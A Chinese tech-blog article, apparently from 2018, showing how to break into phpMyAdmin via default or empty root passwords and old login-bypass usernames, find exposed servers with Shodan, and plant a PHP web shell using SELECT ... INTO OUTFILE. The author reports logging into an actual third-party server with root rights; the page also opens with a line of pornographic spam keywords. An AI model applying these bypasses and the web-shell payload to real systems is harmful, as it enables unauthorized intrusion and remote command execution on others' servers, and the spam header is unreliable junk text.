欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

phpMyAdmin通過密碼漏洞留后門文件

 更新時間:2018年11月20日 09:51:28   作者:吃面包的科學(xué)怪人  
今天小編就為大家分享一篇關(guān)于phpMyAdmin通過密碼漏洞留后門文件,小編覺得內(nèi)容挺不錯的,現(xiàn)在分享給大家,具有很好的參考價(jià)值,需要的朋友一起跟隨小編來看看吧
  • 默認(rèn) phpMyAdmin:用戶名 root 密碼 root 或空登陸。
  • 版本 2.11.3~2.11.4:用戶名 'localhost'@'@" 登陸,無需密碼。
  • 版本 2.11.9.2:用戶名 root 登陸,無需密碼。

經(jīng)測試,第二個漏洞在 phpMyAdmin 3.5.1 版本也是可行的。原理從略。

下面讓我們簡單的上網(wǎng)看看能不能找到一些存在這樣漏洞的登陸頁面。

祭出著名的漏洞搜索引擎 Shodan 并搜索 phpMyAdmin。

phpMyAdmin

先看看有沒有不需要密碼登陸的,逐一嘗試沒有后尋找名字中包含的版本號。這里我找到一個國內(nèi)的(浙江省·杭州市)。

地址已手動打碼。

http://121.***.*.219:80/

登陸成功(root 權(quán)限)。

接下來你可以寫一個 outfile 到對方主機(jī)的網(wǎng)絡(luò)目錄下。俗稱 “留后門”。

SELECT "<?php system($_GET[‘cmd']); ?>" into outfile "后門文件的絕對路徑"

點(diǎn)擊運(yùn)行,不出意外便在對方主機(jī)留下了一個名為 runme.php 的后門文件。

總結(jié)

以上就是這篇文章的全部內(nèi)容了,希望本文的內(nèi)容對大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價(jià)值,謝謝大家對腳本之家的支持。如果你想了解更多相關(guān)內(nèi)容請查看下面相關(guān)鏈接

相關(guān)文章

  • php文件操作小結(jié)(刪除指定文件/獲取文件夾下的文件名/讀取文件夾下圖片名)

    php文件操作小結(jié)(刪除指定文件/獲取文件夾下的文件名/讀取文件夾下圖片名)

    這篇文章主要介紹了php文件操作方法,包括刪除指定文件、獲取文件夾下的文件名及讀取文件夾下圖片名,涉及php針對文件與目錄的常用操作技巧,需要的朋友可以參考下
    2016-05-05
  • 仿AS3實(shí)現(xiàn)PHP 事件機(jī)制實(shí)現(xiàn)代碼

    仿AS3實(shí)現(xiàn)PHP 事件機(jī)制實(shí)現(xiàn)代碼

    仿AS3實(shí)現(xiàn)PHP 事件機(jī)制實(shí)現(xiàn)代碼,需要的朋友可以參考下。
    2011-01-01
  • php5 non-thread-safe和thread-safe這兩個版本的區(qū)別分析

    php5 non-thread-safe和thread-safe這兩個版本的區(qū)別分析

    從PHP5.2.10版本開始(現(xiàn)在有PHP5.2.10和5.3兩個版本),有None-Thread Safe與Thread Safe兩種版本的可供選擇,這兩種版本有何不同,作為使用者來說又應(yīng)該如何選擇呢?下面聚友將為您講述。
    2010-03-03
  • PHP將二維數(shù)組某一個字段相同的數(shù)組合并起來的方法

    PHP將二維數(shù)組某一個字段相同的數(shù)組合并起來的方法

    這篇文章主要介紹了PHP將二維數(shù)組某一個字段相同的數(shù)組合并起來的方法,涉及PHP多維數(shù)組操作的相關(guān)技巧,需要的朋友可以參考下
    2016-02-02
  • PHP 反射機(jī)制實(shí)現(xiàn)動態(tài)代理的代碼

    PHP 反射機(jī)制實(shí)現(xiàn)動態(tài)代理的代碼

    通過代理類ClassOneDelegator來代替ClassOne類來實(shí)現(xiàn)他的方法。
    2008-10-10
  • php 隨機(jī)數(shù)的產(chǎn)生、頁面跳轉(zhuǎn)、件讀寫、文件重命名、switch語句

    php 隨機(jī)數(shù)的產(chǎn)生、頁面跳轉(zhuǎn)、件讀寫、文件重命名、switch語句

    剛做的一個項(xiàng)目中的部分代碼,包含了php中隨機(jī)數(shù)的產(chǎn)生、頁面跳轉(zhuǎn)、件讀寫、文件重命名、switch語句。
    2009-08-08
  • PHP生成圖片縮略圖類示例

    PHP生成圖片縮略圖類示例

    這篇文章主要介紹了PHP生成圖片縮略圖類,可實(shí)現(xiàn)針對圖形文件的屬性獲取、轉(zhuǎn)換、文件生成等功能,非常簡便實(shí)用,需要的朋友可以參考下
    2017-01-01
  • 最新評論